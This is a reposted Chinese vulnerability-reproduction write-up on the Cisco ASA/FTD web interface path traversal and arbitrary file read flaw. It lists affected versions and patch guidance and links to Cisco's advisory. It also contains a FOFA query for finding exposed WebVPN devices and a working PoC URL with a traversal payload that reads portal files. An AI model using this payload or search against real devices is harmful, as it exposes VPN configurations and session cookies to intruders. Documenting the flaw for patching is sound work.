碼上快樂

相關內容    簡體    繁體

CISCO ASA遠程任意文件讀取

本文轉載自   查看原文   2020-08-21 10:17   846    漏洞復現文檔

CISCO ASA遠程任意文件讀取

0X00簡介

Cisco Adaptive Security Appliance (ASA)是思科的一種防火牆設備。

0X01漏洞概述

Cisco Adaptive Security Appliance (ASA)防火牆設備以及Cisco Firepower Threat Defense (FTD)設備的web管理界面存在未授權的目錄穿越漏洞和遠程任意文件讀取漏洞。攻擊者只能查看web目錄下的文件,無法通過該漏洞訪問web目錄之外的文件。該漏洞可以查看webVpn設備的配置信息,cookies等。

0X02影響版本

Cisco ASA 設備影響版本:

  1. <9.6.1
  2. 9.6 < 9.6.4.42
  3. 9.71
  4. 9.8 < 9.8.4.20
  5. 9.9 < 9.9.2.74
  6. 9.10 < 9.10.1.42
  7. 9.12 < 9.12.3.12
  8. 9.13 < 9.13.1.10
  9. 9.14 < 9.14.1.10

Cisco FTD設備影響版本:

  1. 6.2.2
  2. 6.2.3 < 6.2.3.16
  3. 6.3.0 < Migrate to 6.4.0.9 + Hot Fix or to 6.6.0.1
  4. 6.4.0 < 6.4.0.9 + Hot Fix
  5. 6.5.0 < Migrate to 6.6.0.1 or 6.5.0.4 + Hot Fix (August 2020)
  6. 6.6.0 < 6.6.0.1

0X03漏洞復現

FOFA檢索規則
FOFA: “webVpn”

Poc為https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

標紅為讀取的文件名

0X04漏洞修復

安裝Cisco ASA/TFD 最新補丁,進行補丁升級。

具體可以參考:https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86

0X05參考連接

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86

https://twitter.com/aboul3la/status/1286809567989575685

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 CVE-2020-3452 CISCO ASA遠程任意文件讀取漏洞 任意文件讀取 任意文件讀取和下載 Atlassian Confluence任意文件讀取漏洞 Adminer任意文件讀取漏洞復現 任意文件讀取與下載漏洞 泛微雲橋 任意文件讀取 feifeicms后台任意文件讀取 從任意文件讀取到GetShell 任意文件讀取下載漏洞
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM